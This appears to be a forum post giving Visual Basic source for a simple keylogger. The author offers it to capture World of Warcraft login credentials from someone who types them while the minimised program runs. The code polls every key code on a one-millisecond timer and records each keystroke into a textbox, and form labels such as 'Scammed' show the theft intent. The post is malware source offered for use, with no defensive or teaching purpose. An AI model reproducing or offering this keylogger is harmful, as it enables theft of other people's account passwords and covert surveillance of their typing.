Hey this is for use in Visual basic, just keep the program minamized and when they log into wow there info will be put into the msg box in VB.
Enter this code, if this doesn't work i can post a link in a later time im in a rush right now.
make sure that you put a timer into the form and a textbox, like i said if you want i will add a link to the FRM later
Dim result As Integer
'Add a Timer & a Textbox to the form
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Form_Load()
Timer1.Interval = 1
lbltime.Caption = "Scammed"
frmTIMEMACHINE.Caption = "Log me"
End Sub
Private Sub Timer1_Timer()
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End If
Next i
End Sub
ok then when the program is running it logs everything typed on the keyboard, its really simple if you need any help let me know..good luck